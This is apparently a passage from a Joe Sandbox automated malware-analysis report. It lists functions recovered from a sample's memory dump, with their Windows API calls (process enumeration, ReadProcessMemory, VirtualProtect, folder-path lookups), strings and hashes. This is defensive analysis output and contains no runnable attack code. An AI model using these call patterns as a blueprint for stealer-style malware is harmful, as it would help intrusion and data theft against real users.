API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9

Function 0248C347 Relevance: 6.4, APIs: 5, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C387

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction ID: 6bdd926fd0f99392b899760fcf4174a374bb31b20284df3e262ebf43a2f8b2df
Opcode Fuzzy Hash: 1c5fd1aee031a04934ccf0036cf40de410e2b33f36f19f6dc211c43ea24ae74d
Instruction Fuzzy Hash: 32319E70E10255DBDB24FFB5DC88AAE7BF6AB45308F04406BD811A7251D7B4C942DFA4

Function 0248F077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248F0A6
lstrlen.KERNEL32(00000000), ref: 0248F0B4
lstrcpy.KERNEL32(00000000,00000000), ref: 0248F0DB
lstrlen.KERNEL32(00000000), ref: 0248F0E2
lstrcpy.KERNEL32(00000000,00435550), ref: 0248F116

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction ID: c200e2374b29e6d9aadfe5a6d7574f45b55c89967480385ea400720eea4b5942
Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction Fuzzy Hash: 7031BF71A005A49FC721FF39DC84EDE7BA6AF01308F41442AEC54DBA12DB64D809DF94

Function 02493C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 02497477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02497495

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02493C9D
Process32First.KERNEL32(00000000,00000128), ref: 02493CB0
Process32Next.KERNEL32(00000000,00000128), ref: 02493CC6

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

CloseHandle.KERNEL32(00000000), ref: 02493DFE

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction ID: 51bd2a5da9ad3ce96741125201c18a0b6dba78b4a8d0c1b8b93f2ce4e7d5e55d
Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction Fuzzy Hash: F481E870900215CFCB15CF18D948B96BBB6BB45329F29C1EEE4095B3A2D776D882CF90

Function 02492443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02492469
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02492545
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 024925A7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02492686), ref: 024925B9

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction ID: 455dff00fa8e398c9d0d0bcabe3bab3579252fa7b122ae86091dc49db69f7186
Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction Fuzzy Hash: DE418171A00219ABDF20CFA4D994BAF7BB6FB85724F14852AED15EB340D374D941CB90

Function 02474BE7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 02474C22
RtlAllocateHeap.NTDLL(00000000), ref: 02474C29
strlen.MSVCRT ref: 02474CB6
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02474D37

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2355128949-0
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 459ea1b4b2cbd155fe06b431f612b06a71d02f0cb14c12ceea49145056625b5b
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: 8A31E920F4833C7F86206BA56C46BDFBED4DF8E760F389053F51856188C9A86405CEEA

Function 02488027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0248803F

Part of subcall function 0249A457: std::exception::exception.LIBCMT ref: 0249A46C
Part of subcall function 0249A457: __CxxThrowException@8.LIBCMT ref: 0249A481
Part of subcall function 0249A457: std::exception::exception.LIBCMT ref: 0249A492

std::_Xinvalid_argument.LIBCPMT ref: 0248805D
std::_Xinvalid_argument.LIBCPMT ref: 02488078
memcpy.MSVCRT(?,?,?,00000000,?,?,02487F61,00000000,?,?,00000000,?,0247941D,?), ref: 024880DB

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 38492a9ec0e87f118281fc727f64461155de9ce00ef2b7453d6b40936bf1343d
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 8121D5313106048FD725EE2CDD80A2EB7E6EF96714FA14A2FE592CB381D772D8408B95

Function 02488329 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0248836C
lstrlen.KERNEL32(00000000), ref: 024883B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024883E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024883F9
lstrlen.KERNEL32(00000000), ref: 02488437
lstrcpy.KERNEL32(00000000,00000000), ref: 02488466
strtok_s.MSVCRT ref: 02488476

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction ID: 56724283be1fd5afd4c13a7dcb5bdf71d6efa9c7df6337d9adb98bc71c2b976c
Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction Fuzzy Hash: 602123729102099BC722EF68DC48B9EBBB4EF00714F14419EEC599B381EB75D942CB90

Function 0248EF37 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0248EF7B
lstrcpy.KERNEL32(00000000,?), ref: 0248EFAA
lstrcat.KERNEL32(?,00000000), ref: 0248EFB8
lstrcat.KERNEL32(?,00638930), ref: 0248EFD3

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction ID: 4fd0debc260760dcde2f13e2794112793d7f39610e55c1e880eb0ad965d30c7b
Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction Fuzzy Hash: 1E3142B1A00158EBDB10EF74DC44BED77B5AF44304F10446AFA9597251DBB09E449F94

Function 0248CBA7 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0248CBCC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248CC09
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248CC38

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID:
API String ID: 2610293679-0
Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction ID: 059bd636cc4b983fcf42dca19eb1c7c9dc9265bfb34a55e93d63cfbb0507272e
Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction Fuzzy Hash: 3E21CE71E10218AFDB20EFB5DC84AEEBBB4EB08308F04006BD815E7211D774CA469BA4

Function 02488F67 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004353C8), ref: 02488F81
ExitProcess.KERNEL32 ref: 02488F8E
strtok_s.MSVCRT ref: 02488FA0

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction ID: f63c5fd41ce7f4d16ce719a85b3c4c0cd4f6449886e8e69d99f125465a570084
Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction Fuzzy Hash: B9015675910209FBDB11DFA4DC848AE77B9DB84304B40447AF90697200D7759A458BA5

Function 0248CCC4 Relevance: 6.0, APIs: 4, Instructions: 43stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00435204), ref: 0248CCCA
StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 0248CCE1
StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 0248CCF8
strtok_s.MSVCRT ref: 0248CDEE

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction ID: 2abcea882e12489be174242b06be196f6369e8e50bbdeeb640da04fb4c27344c
Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
Instruction Fuzzy Hash: E701AD71A00224E7CB15AFA1DC84BEE7BA5AF00705F10405BEC01AB200E7B896458EB5

Function 02494707 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02494719
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02494734
CloseHandle.KERNEL32(00000000), ref: 0249473B
lstrcpy.KERNEL32(00000000,?), ref: 0249476E

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
String ID:
API String ID: 4028989146-0
Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction ID: 5685b57771a45a69d2911511b14ebf5ab0383253a88ab7401b7a870fc29fe1e1
Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction Fuzzy Hash: 19F0F6B09016192FEB20AB74DC8CBEABBB9DF05704F0001E5FA55D7280DBF088858BE0

Function 004087B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040880C
memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

string too long, xrefs: 00408807

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D

Function 02478AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 02478B1A

Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A41F
Part of subcall function 0249A40A: __CxxThrowException@8.LIBCMT ref: 0249A434
Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A445

Strings

yxxx, xrefs: 02478B71
yxxx, xrefs: 02478B24

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: 2408fc04d8a96cb2a387bac7c58230571d458a4226e4e40a65a9df9851f8144e
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 523189B5E005199BCB08DF58C8956AEBBB6EB88310F14826AE915AF344D734E901CBD1

Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408AA5

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,?,?), ref: 00408AEF

Strings

string too long, xrefs: 00408AA0

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
String ID: string too long
API String ID: 2475949303-2556327735
Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798

Function 02495B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 02495BA9

Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A41F
Part of subcall function 0249A40A: __CxxThrowException@8.LIBCMT ref: 0249A434
Part of subcall function 0249A40A: std::exception::exception.LIBCMT ref: 0249A445

std::_Xinvalid_argument.LIBCPMT ref: 02495BBC

Strings

Sec-WebSocket-Version: 13, xrefs: 02495BAE

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction ID: 31f39f7832120b1a7463e15e1ca8e7f150951fb032f5bc632a74e2d6cd9dce44
Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction Fuzzy Hash: FA1182703047508BCB328F2CE940B0A7BE2AB82710FB40A6FE491DB785D761D841C791

Function 00408BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408BBF

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5

Strings

invalid string position, xrefs: 00408BBA

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 655285616-1799206989
Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398

Function 0248C3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
lstrcat.KERNEL32(00000000), ref: 0248C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction ID: 7cebde6e71c35603b835b0ec37180e641ef40920a7385c177ecc85d683c145c8
Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction Fuzzy Hash: 7A316971E10265DBCF24EFA5CC84A9EB7F6AF44308F1444ABD814AB650DB74DA41DF60

Function 0248C479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545

Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0

lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
lstrcat.KERNEL32(00000000), ref: 0248C5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629

Memory Dump Source

Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2470000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction ID: dad57acc9479fcee17df5ff1be79e528d5dc8418c0c5332742bf9d111a19b871
Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction Fuzzy Hash: B2317871E10265DBCF24EFA5CC84A9EB7F2AF44308F14446BD814AB611DB74DA42DFA0

Function 0248C41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02494287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 024942B4
Part of subcall function 02494287: lstrcpy.KERNEL32(00000000,?), ref: 024942E9

Part of subcall function 02497557: lstrcpy.KERNEL32(00000000), ref: 02497586
Part of subcall function 02497557: lstrcat.KERNEL32(00000000), ref: 02497592

Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0

